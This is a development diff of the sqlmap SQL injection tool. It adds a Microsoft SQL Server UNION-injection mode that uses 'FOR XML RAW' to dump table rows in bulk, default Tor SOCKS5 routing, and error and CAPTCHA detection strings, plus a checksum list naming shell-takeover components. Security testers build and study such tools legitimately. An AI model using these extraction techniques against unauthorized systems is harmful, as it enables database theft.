BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
# Generic www root directory names
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
@@ -612,7 +615,7 @@ MAX_HELP_OPTION_LENGTH = 18
MAX_CONNECT_RETRIES = 100
# Strings for detecting formatting errors
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException", "CF_SQL_INTEGER", "InvalidParamTypeException", "Invalid parameter type")
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException")
# Regular expression used for extracting ASP.NET view state values
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
@@ -662,6 +665,9 @@ SUHOSIN_MAX_VALUE_LENGTH = 512
# Minimum size of an (binary) entry before it can be considered for dumping to disk
MIN_BINARY_DISK_DUMP_SIZE = 100
# Filenames of payloads xml files (in order of loading)
PAYLOAD_XML_FILES = ("boolean_blind.xml", "error_based.xml", "inline_query.xml", "stacked_queries.xml", "time_blind.xml", "union_query.xml")
# Regular expression used for extracting form tags
FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"

2
lib/parse/cmdline.py
View File

@@ -173,7 +173,7 @@ def cmdLineParser(argv=None):
help="Set Tor proxy port other than default")
request.add_option("--tor-type", dest="torType",
help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)")
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
request.add_option("--check-tor", dest="checkTor",
action="store_true",

6
lib/parse/payloads.py
View File

@@ -14,6 +14,7 @@ from lib.core.data import conf
from lib.core.data import paths
from lib.core.datatype import AttribDict
from lib.core.exception import SqlmapInstallationException
from lib.core.settings import PAYLOAD_XML_FILES
def cleanupVals(text, tag):
if tag in ("clause", "where"):
@@ -83,10 +84,7 @@ def loadBoundaries():
parseXmlNode(root)
def loadPayloads():
payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
payloadFiles.sort()
for payloadFile in payloadFiles:
for payloadFile in PAYLOAD_XML_FILES:
payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
try:

2
lib/request/basic.py
View File

@@ -359,6 +359,8 @@ def processResponse(page, responseHeaders):
if re.search(r"(?i)captcha", match.group(0)):
kb.captchaDetected = True
warnMsg = "potential CAPTCHA protection mechanism detected"
if re.search(r"(?i)<title>[^<]*CloudFlare", page):
warnMsg += " (CloudFlare)"
singleTimeWarnMessage(warnMsg)
break

2
lib/request/connect.py
View File

@@ -446,7 +446,7 @@ class Connect(object):
requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))
if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION
requestHeaders += "\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive")
requestMsg += "\n%s" % requestHeaders

2
lib/takeover/web.py
View File

@@ -217,8 +217,6 @@ class Web:
if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
directory = "/%s" % directory
else:
directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory
if not directory.endswith('/'):
directory += '/'

98
lib/techniques/union/use.py
View File

@@ -5,8 +5,10 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import binascii
import re
import time
import xml.etree.ElementTree
from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
@@ -46,8 +48,10 @@ from lib.core.enums import PAYLOAD
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapSyntaxException
from lib.core.settings import MAX_BUFFERED_PARTIAL_UNION_LENGTH
from lib.core.settings import NULL
from lib.core.settings import SQL_SCALAR_REGEX
from lib.core.settings import TURN_OFF_RESUME_INFO_LIMIT
from lib.core.settings import UNICODE_ENCODING
from lib.core.threads import getCurrentThreadData
from lib.core.threads import runThreads
from lib.core.unescaper import unescaper
@@ -62,15 +66,18 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
threadData.resumed = retVal is not None
if retVal is None:
# Prepare expression with delimiters
injExpression = unescaper.escape(agent.concatQuery(expression, unpack))
# Forge the UNION SQL injection request
vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
kb.unionDuplicates = vector[7]
kb.forcePartialUnion = vector[8]
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]
if not kb.rowXmlMode:
injExpression = unescaper.escape(agent.concatQuery(expression, unpack))
kb.unionDuplicates = vector[7]
kb.forcePartialUnion = vector[8]
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]
else:
where = vector[6]
query = agent.forgeUnionQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False)
payload = agent.payload(newValue=query, where=where)
# Perform the request
@@ -78,22 +85,57 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
incrementCounter(PAYLOAD.TECHNIQUE.UNION)
# Parse the returned page to get the exact UNION-based
# SQL injection output
def _(regex):
return reduce(lambda x, y: x if x is not None else y, (\
extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \
extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \
if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \
None)
if not kb.rowXmlMode:
# Parse the returned page to get the exact UNION-based
# SQL injection output
def _(regex):
return reduce(lambda x, y: x if x is not None else y, (\
extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \
extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \
if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \
None)
# Automatically patching last char trimming cases
if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
warnMsg = "automatically patching output having last char trimmed"
singleTimeWarnMessage(warnMsg)
page = page.replace(kb.chars.stop[:-1], kb.chars.stop)
# Automatically patching last char trimming cases
if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
warnMsg = "automatically patching output having last char trimmed"
singleTimeWarnMessage(warnMsg)
page = page.replace(kb.chars.stop[:-1], kb.chars.stop)
retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop))
retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop))
else:
output = extractRegexResult(r"(?P<result>(<row.+?/>)+)", page)
if output:
try:
root = xml.etree.ElementTree.fromstring("<root>%s</root>" % output.encode(UNICODE_ENCODING))
retVal = ""
for column in kb.dumpColumns:
base64 = True
for child in root:
value = child.attrib.get(column, "").strip()
if value and not re.match(r"\A[a-zA-Z0-9+/]+={0,2}\Z", value):
base64 = False
break
try:
value.decode("base64")
except binascii.Error:
base64 = False
break
if base64:
for child in root:
child.attrib[column] = child.attrib.get(column, "").decode("base64") or NULL
for child in root:
row = []
for column in kb.dumpColumns:
row.append(child.attrib.get(column, NULL))
retVal += "%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(row), kb.chars.stop)
except:
pass
else:
retVal = getUnicode(retVal)
if retVal is not None:
retVal = getUnicode(retVal, kb.pageEncoding)
@@ -103,7 +145,8 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
retVal = htmlunescape(retVal).replace("<br>", "\n")
hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal)
else:
elif not kb.rowXmlMode:
trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start))
if trimmed:
@@ -174,6 +217,13 @@ def unionUse(expression, unpack=True, dump=False):
# Set kb.partRun in case the engine is called from the API
kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None
if Backend.isDbms(DBMS.MSSQL) and kb.dumpColumns:
kb.rowXmlMode = True
_ = "(%s FOR XML RAW, BINARY BASE64)" % expression
output = _oneShotUnionUse(_, False)
value = parseUnionPage(output)
kb.rowXmlMode = False
if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper():
# Removed ORDER BY clause because UNION does not play well with it
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I)
@@ -186,7 +236,7 @@ def unionUse(expression, unpack=True, dump=False):
# SQL limiting the query output one entry at a time
# NOTE: we assume that only queries that get data from a table can
# return multiple entries
if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \
if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \
kb.forcePartialUnion or \
(dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \
" FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \

20
plugins/generic/databases.py
View File

@@ -8,6 +8,7 @@ See the file 'doc/COPYING' for copying permission
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import filterPairValues
from lib.core.common import flattenValue
from lib.core.common import getLimitRange
@@ -19,6 +20,7 @@ from lib.core.common import isTechniqueAvailable
from lib.core.common import parseSqliteTableSchema
from lib.core.common import popValue
from lib.core.common import pushValue
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import safeSQLIdentificatorNaming
from lib.core.common import singleTimeWarnMessage
@@ -41,6 +43,7 @@ from lib.core.settings import CURRENT_DB
from lib.request import inject
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists
from lib.techniques.union.use import unionUse
class Databases:
"""
@@ -539,7 +542,22 @@ class Databases:
infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
logger.info(infoMsg)
values = inject.getValue(query, blind=False, time=False)
values = None
if Backend.isDbms(DBMS.MSSQL) and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
expression = query
kb.dumpColumns = []
kb.rowXmlMode = True
for column in extractRegexResult(r"SELECT (?P<result>.+?) FROM", query).split(','):
kb.dumpColumns.append(randomStr().lower())
expression = expression.replace(column, "%s AS %s" % (column, kb.dumpColumns[-1]), 1)
values = unionUse(expression)
kb.rowXmlMode = False
kb.dumpColumns = None
if values is None:
values = inject.getValue(query, blind=False, time=False)
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
index, values = 1, []

2
plugins/generic/entries.py
View File

@@ -137,6 +137,7 @@ class Entries:
logger.warn(warnMsg)
continue
kb.dumpColumns = colList
colNames = colString = ", ".join(column for column in colList)
rootQuery = queries[Backend.getIdentifiedDbms()].dump_table
@@ -370,6 +371,7 @@ class Entries:
logger.critical(errMsg)
finally:
kb.dumpColumns = None
kb.dumpTable = None
def dumpAll(self):

2
sqlmap.conf
View File

@@ -124,7 +124,7 @@ tor = False
# Set Tor proxy type.
# Valid: HTTP, SOCKS4, SOCKS5
torType = HTTP
torType = SOCKS5
# Check to see if Tor is used properly.
# Valid: True or False

36
sqlmap.py
View File

@@ -34,6 +34,7 @@ from lib.core.data import logger
try:
from lib.controller.controller import start
from lib.core.common import banner
from lib.core.common import checkIntegrity
from lib.core.common import createGithubIssue
from lib.core.common import dataToStdout
from lib.core.common import getSafeExString
@@ -44,7 +45,6 @@ try:
from lib.core.data import cmdLineOptions
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import paths
from lib.core.common import unhandledExceptionMessage
from lib.core.common import MKSTEMP_PREFIX
from lib.core.exception import SqlmapBaseException
@@ -85,10 +85,8 @@ def modulePath():
return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
def checkEnvironment():
paths.SQLMAP_ROOT_PATH = modulePath()
try:
os.path.isdir(paths.SQLMAP_ROOT_PATH)
os.path.isdir(modulePath())
except UnicodeEncodeError:
errMsg = "your system does not properly handle non-ASCII paths. "
errMsg += "Please move the sqlmap's directory to the other location"
@@ -111,7 +109,7 @@ def main():
try:
checkEnvironment()
setPaths()
setPaths(modulePath())
banner()
# Store original command line options for possible later restoration
@@ -196,12 +194,20 @@ def main():
excMsg = traceback.format_exc()
try:
if any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")):
if not checkIntegrity():
errMsg = "code integrity check failed. "
errMsg += "You should retrieve the latest development version from official GitHub "
errMsg += "repository at '%s'" % GIT_PAGE
logger.critical(errMsg)
print
dataToStdout(excMsg)
raise SystemExit
elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")):
errMsg = "no space left on output device"
logger.error(errMsg)
raise SystemExit
elif all(_ in excMsg for _ in ("No such file", "_'")):
elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")):
errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1]
errMsg += "You should retrieve the latest development version from official GitHub "
errMsg += "repository at '%s'" % GIT_PAGE
@@ -271,14 +277,14 @@ def main():
kb.threadException = True
if kb.get("tempDir"):
for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY):
for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)):
try:
os.remove(filepath)
except OSError:
pass
if not filter(None, (filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in ('.lock', '.exe', '_')))):
shutil.rmtree(kb.tempDir, ignore_errors=True)
for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY):
for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)):
try:
os.remove(filepath)
except OSError:
pass
if not filter(None, (filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in ('.lock', '.exe', '_')))):
shutil.rmtree(kb.tempDir, ignore_errors=True)
if conf.get("hashDB"):
try:

6
sqlmapapi.py
View File

@@ -15,7 +15,6 @@ from lib.utils import versioncheck # this has to be the first non-standard impo
from sqlmap import modulePath
from lib.core.common import setPaths
from lib.core.data import paths
from lib.core.data import logger
from lib.core.settings import RESTAPI_DEFAULT_ADAPTER
from lib.core.settings import RESTAPI_DEFAULT_ADDRESS
@@ -31,9 +30,8 @@ def main():
# Set default logging level to debug
logger.setLevel(logging.DEBUG)
# Initialize path variable
paths.SQLMAP_ROOT_PATH = modulePath()
setPaths()
# Initialize paths
setPaths(modulePath())
# Parse command line options
apiparser = optparse.OptionParser()

2
thirdparty/clientform/clientform.py vendored
View File

@@ -1142,7 +1142,7 @@ def _ParseFileEx(file, base_uri,
try:
form.fixup()
except AttributeError, ex:
if "item is disabled" not in str(ex):
if not any(_ in str(ex) for _ in ("item is disabled", "is readonly")):
raise
return forms

449
txt/checksum.md5 Normal file
View File

@@ -0,0 +1,449 @@
c981335b0035fe8d5667d1c952e641e4 extra/beep/beep.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/beep/__init__.py
002e2688fe38d03dd6d64a4c2acbee9f extra/cloak/cloak.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/cloak/__init__.py
4d986b77ce6f616eb904e0920ae60890 extra/dbgtool/dbgtool.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/dbgtool/__init__.py
acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_
2176d964f2d5ba2d871383d6a1868b8f extra/icmpsh/icmpsh_m.py
2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/__init__.py
2237d0568236c354b0436d2cd9434f97 extra/mssqlsig/update.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/safe2bin/__init__.py
cc5b67714d8a0b6b81d29a4f15634c16 extra/safe2bin/safe2bin.py
d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_
2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_
c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_
b46521e29ea3d813bab5aeb16cac6498 extra/shutils/duplicates.py
4bf52b3fd5e906b9bbe104dda769f5c5 extra/shutils/pylint.py
05615626222060120450518136b14ba9 extra/shutils/regressiontest.py
cc9c82cfffd8ee9b25ba3af6284f057e extra/sqlharvest/__init__.py
4f2f817596540d82f9fcc0c5b2228beb extra/sqlharvest/sqlharvest.py
b704c0f943c015f6247cfae20048ae8e lib/controller/action.py
d1451b43f3ac80bfbea8657e288865f8 lib/controller/checks.py
7c5ba631796f12d6de9b667e4cc7812b lib/controller/controller.py
5ae8f657fd4e8026fcc9624f5b5533fe lib/controller/handler.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/controller/__init__.py
2689f320908964b2c88a3eb8265fd2dd lib/core/agent.py
eb0bd28b0bd9fbf67dcc3119116df377 lib/core/bigarray.py
1dd298ac06c961037bb76a675bb4b322 lib/core/common.py
5680d0c446a3bed5c0f2a0402d031557 lib/core/convert.py
e77cca1cb063016f71f6e6bdebf4ec73 lib/core/data.py
1d042f0bc0557d3fd564ea5a46deb77e lib/core/datatype.py
e4ca0fd47f20cf7ba6a5f5cbf980073c lib/core/decorators.py
67f206cf2658145992cc1d7020138325 lib/core/defaults.py
4a16002c5d9cd047c2e89ddc5db63737 lib/core/dicts.py
1f98d3f57ce21d625fd67adb26cfd13c lib/core/dump.py
34a45b9bc68a6381247a620ddf30de1c lib/core/enums.py
e4aec2b11c1ad6039d0c3dbbfbc5eb1a lib/core/exception.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/core/__init__.py
91c514013daa796e2cdd940389354eac lib/core/log.py
b9779615206791e6ebbaa84947842b49 lib/core/optiondict.py
85b144015724e1961e6c9ea1a42b329a lib/core/option.py
1e8948dddbd12def5c2af52530738059 lib/core/profiling.py
e60456db5380840a586654344003d4e6 lib/core/readlineng.py
5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py
99a2b496b9d5b546b335653ca801153f lib/core/revision.py
7c15dd2777af4dac2c89cab6df17462e lib/core/session.py
1a0fab09e6840a52bdfec892fbd9ee53 lib/core/settings.py
7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py
23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py
0bc2fae1dec18cdd11954b22358293f2 lib/core/target.py
21b9aa385c851a4e8faaff9b985e29b8 lib/core/testing.py
424a6cf9bdfaf7182657ed7929d7df5a lib/core/threads.py
53c15b78e0288274f52410db25406432 lib/core/unescaper.py
6bdc53e2ca152ff8cd35ad671e48a96b lib/core/update.py
8485a3cd94c0a5af2718bad60c5f1ae5 lib/core/wordlist.py
354ecc0c6d3e0ac9c06ed897c4d52edf lib/core/xmldump.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/__init__.py
c1288bc4ce5651dbdd82d4a9435fdc03 lib/parse/banner.py
bf7fbfb04d6150d19ecfd9b25ee5618a lib/parse/cmdline.py
8ec4d4f02634834701f8258726f2e511 lib/parse/configfile.py
fe4e2152292587928edb94c9a4d311ff lib/parse/handler.py
8e6bfb13e5a34b2610f3ff23467a34cf lib/parse/headers.py
c8e14fbfc6616d8149b2603c97abec84 lib/parse/html.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/parse/__init__.py
af6b8e1c6eb074b56bbd9cd80aebcd97 lib/parse/payloads.py
b40a4c5d91770d347df36d3065b63798 lib/parse/sitemap.py
9299f21804033f099681525bb9bf51c0 lib/request/basicauthhandler.py
a3e83cfe7e6825fb1b70951ad290d2ae lib/request/basic.py
9d757c63413a15222af90d3648de9de3 lib/request/comparison.py
72a0e7bb1010bb39c6538dbc77eae180 lib/request/connect.py
49b4c583af68689de5f9acb162de2939 lib/request/direct.py
1a46f7bb26b23ec0c0d9d9c95828241b lib/request/dns.py
567656470d23a42ab57ec55a03989dbb lib/request/httpshandler.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/request/__init__.py
aa155f8b27d56485d3ff15efa5e1b07a lib/request/inject.py
3fc323d525beddd14cd4d4dca4934fa8 lib/request/methodrequest.py
585a6705cfac79f795b835affb80c901 lib/request/pkihandler.py
b2ffd261947994f4a4af555d468b4970 lib/request/rangehandler.py
53eede2efbfabc7315ea99756a03f49d lib/request/redirecthandler.py
4d838b086f128a94a91aa293ca1e0719 lib/request/templates.py
937b7e276f25ccac5a2ac0bf9b1ef434 lib/takeover/abstraction.py
3ecf028d8d93025d2a12c6f6fc13adb2 lib/takeover/icmpsh.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/takeover/__init__.py
1d064463302b85b2241263ea48a83837 lib/takeover/metasploit.py
7083825564c051a7265cfdd1a5e6629c lib/takeover/registry.py
7d6cd7bdfc8f4bc4e8aed60c84cdf87f lib/takeover/udf.py
f6e3084abd506925a8be3d1c0a6d058c lib/takeover/web.py
9af83a62de360184f1c14e69b8a95cfe lib/takeover/xp_cmdshell.py
927092550c89f8c3c5caad2b14af0830 lib/techniques/blind/inference.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/blind/__init__.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/brute/__init__.py
d36effffe64e63ef9b3be490f850e2cc lib/techniques/brute/use.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/dns/__init__.py
b658a1df33fd967c0b6d82911383abda lib/techniques/dns/test.py
4033bdb9e6973ee814fb68d3cf9e710c lib/techniques/dns/use.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/error/__init__.py
4a1fb475f4a193e2cac48c8c038f5677 lib/techniques/error/use.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/__init__.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/techniques/union/__init__.py
f5d6884cdeed28281187c111d3e49e3b lib/techniques/union/test.py
12ce1bb7ee5f1f23f58be12fe9fa8472 lib/techniques/union/use.py
2dfc03a7322c46deb2e5353a7fd4be5e lib/utils/api.py
8cdc8c1e663c3b92a756fb7b02cc3c02 lib/utils/crawler.py
393f8fd1684308213e1d2e6a9d4258c2 lib/utils/deps.py
4dfd3a95e73e806f62372d63bc82511f lib/utils/getch.py
b1e83fc549334fae8f60552dcdad28cb lib/utils/hashdb.py
0330607242d4f704ae6d7bba5f52ccae lib/utils/hash.py
a3e885f7d4c6ff05db1156244bb84158 lib/utils/htmlentities.py
cc9c82cfffd8ee9b25ba3af6284f057e lib/utils/__init__.py
f0bd8f810332027a5c2c60bd17455f90 lib/utils/pivotdumptable.py
da08a0b58c08ff452c7d1da4857d6680 lib/utils/progress.py
4c8895fb543aa5ae81f2d066422613f0 lib/utils/purge.py
cc9b0f68dd58a2576a5a454b7f5f6b9c lib/utils/search.py
4a0374ac0bc9d726446f04c77fbb5697 lib/utils/sqlalchemy.py
8013e4a4c62ad916452434ea3c352a7a lib/utils/timeout.py
e6fa0e76367a77015da113811dfd9712 lib/utils/versioncheck.py
4759e0bb8931d461dfcad410ca05fc5d lib/utils/xrange.py
988100b4a1cd3b07acfd8b6ec692aed5 plugins/dbms/access/connector.py
27a5ae5611836b073dd53b21435f0979 plugins/dbms/access/enumeration.py
438090ab8ca63d9c23831a5ffbef74d9 plugins/dbms/access/filesystem.py
ec6e8a706c3e281677de4a21f0b68d6e plugins/dbms/access/fingerprint.py
7e54993a1a8340425eb9e6d1396596de plugins/dbms/access/__init__.py
994fc6a93632219d76831aad415742de plugins/dbms/access/syntax.py
495e835bea7703ae343179e3df838b86 plugins/dbms/access/takeover.py
393da1c45d0b1ecf67bfa5ae9a490f3f plugins/dbms/db2/connector.py
90271f2422c4374edfb7936151a440a4 plugins/dbms/db2/enumeration.py
e8f0f28da98020dce27970a50e10a23b plugins/dbms/db2/filesystem.py
b95216204096179fd50004c489ba5c6e plugins/dbms/db2/fingerprint.py
49b62689e8f0d2da9e10d782b53a3d13 plugins/dbms/db2/__init__.py
8300ca02ecf00d3b00d78ecde8a86c09 plugins/dbms/db2/syntax.py
5f130772d2295ae61140acba894eaceb plugins/dbms/db2/takeover.py
42fc25e6a5363d2447ed1e2a81d77159 plugins/dbms/firebird/connector.py
22cadcf4f20aeea2f2abead6553ed460 plugins/dbms/firebird/enumeration.py
9e12a966e280951deb996a8a634eb9e2 plugins/dbms/firebird/filesystem.py
74f0a234bcb11cac697751ef9488579b plugins/dbms/firebird/fingerprint.py
0f9bf6cf9dad52336ad1c528bdb4d142 plugins/dbms/firebird/__init__.py
d16de4d9516f95956d4518e9412de77a plugins/dbms/firebird/syntax.py
80496d64b22c10ed4893b4149a162365 plugins/dbms/firebird/takeover.py
e125fb5d8d75861532a01828d829d85e plugins/dbms/hsqldb/connector.py
8fbc4653d0c880ca78278c8ae6823136 plugins/dbms/hsqldb/enumeration.py
b763ce42f66f7b81d05130bbd3e383a9 plugins/dbms/hsqldb/filesystem.py
c9d59b7c60aa0f0b23f920f932547e40 plugins/dbms/hsqldb/fingerprint.py
d278ad5f1c13fea871ed1120942244d5 plugins/dbms/hsqldb/__init__.py
d781720e15c23b662bae3098ed470756 plugins/dbms/hsqldb/syntax.py
2f957281cfe80396f73a3dccc0cb6d45 plugins/dbms/hsqldb/takeover.py
cc9c82cfffd8ee9b25ba3af6284f057e plugins/dbms/__init__.py
4c8667e8af763ddf82ee314c6681d4e1 plugins/dbms/maxdb/connector.py
075fd66b8bbabed18aeb304c6c0ef2a2 plugins/dbms/maxdb/enumeration.py
aa46f115a06c66b1e011aba98ec284bd plugins/dbms/maxdb/filesystem.py
535b389c7bac381c06ca34b0fe48c8ae plugins/dbms/maxdb/fingerprint.py
c24f2512f13dbaff9543fe6d96cbe53b plugins/dbms/maxdb/__init__.py
df0766e0f322505dcbfca2fc792fe62f plugins/dbms/maxdb/syntax.py
aeec4f12950e20c46da405d23ea08dbb plugins/dbms/maxdb/takeover.py
579d582f3716c310689b4aa7317b57df plugins/dbms/mssqlserver/connector.py
8318300d92865330f5b0db5c3df29835 plugins/dbms/mssqlserver/enumeration.py
6c249bcdef486803686a8b2f11566637 plugins/dbms/mssqlserver/filesystem.py
d01229e7161a5071934fc26b48a11e8c plugins/dbms/mssqlserver/fingerprint.py
2fbe5e485bcd05511cd1d7cb8cbdbde4 plugins/dbms/mssqlserver/__init__.py
a727b3cac910622d22b2ed92815716ef plugins/dbms/mssqlserver/syntax.py
f3da9f5298dac5d1f468828c07c81f70 plugins/dbms/mssqlserver/takeover.py
d8cd212ba7be09483af3f32256b71f05 plugins/dbms/mysql/connector.py
d251aecff7544f79f78385386bb7fa35 plugins/dbms/mysql/enumeration.py
a970f90c91ebd3a7e22955424fe5414e plugins/dbms/mysql/filesystem.py
eed5093257e65adfae7bb56c5a6d3eb0 plugins/dbms/mysql/fingerprint.py
a4535cb3873ada344e6e61dbe1a546d3 plugins/dbms/mysql/__init__.py
4ad721acc40a964fc67154dd4683870e plugins/dbms/mysql/syntax.py
aa88b5d6198cd31d9ab2be664da9a265 plugins/dbms/mysql/takeover.py
2f2b7b1f08a8e6bfbe2fd0467d477667 plugins/dbms/oracle/connector.py
061b5f0a2cf2e61c8a03ef73ee43a869 plugins/dbms/oracle/enumeration.py
97579ede42f5fa64397792a65d6c0781 plugins/dbms/oracle/filesystem.py
82b3e501ebae93c5dc0ef2abccb10177 plugins/dbms/oracle/fingerprint.py
ecfc3b8b1e97e41cad6681fc68f93998 plugins/dbms/oracle/__init__.py
1814ceabb19b6fcf908d4638cf0436ef plugins/dbms/oracle/syntax.py
cac6bd84d44ac929da6800719279875b plugins/dbms/oracle/takeover.py
6c54ca5c9efad3e437467f9fe44435d6 plugins/dbms/postgresql/connector.py
419dd50e6688fef760fec4f71430fb29 plugins/dbms/postgresql/enumeration.py
9756fc02fc84719c3e330fcc7914bf17 plugins/dbms/postgresql/filesystem.py
28bce42dac3ee8efccc78c7a58b170b6 plugins/dbms/postgresql/fingerprint.py
0e7d17abf68f1dd770e969c84878d246 plugins/dbms/postgresql/__init__.py
8711e7c1265a5e651c9aadca7db40cd5 plugins/dbms/postgresql/syntax.py
50d8070e687e5806058a121311a36385 plugins/dbms/postgresql/takeover.py
316c39c5c866c5e6b0afaf51fc773ca3 plugins/dbms/sqlite/connector.py
1cbe2b28041e52b421f256b813e0ec9d plugins/dbms/sqlite/enumeration.py
f3318e79b1130e052242db8299eb1968 plugins/dbms/sqlite/filesystem.py
17752c107b24f5a83926f8c62a50f15a plugins/dbms/sqlite/fingerprint.py
098c50a83ceca04e3acc67a7c66fb0d2 plugins/dbms/sqlite/__init__.py
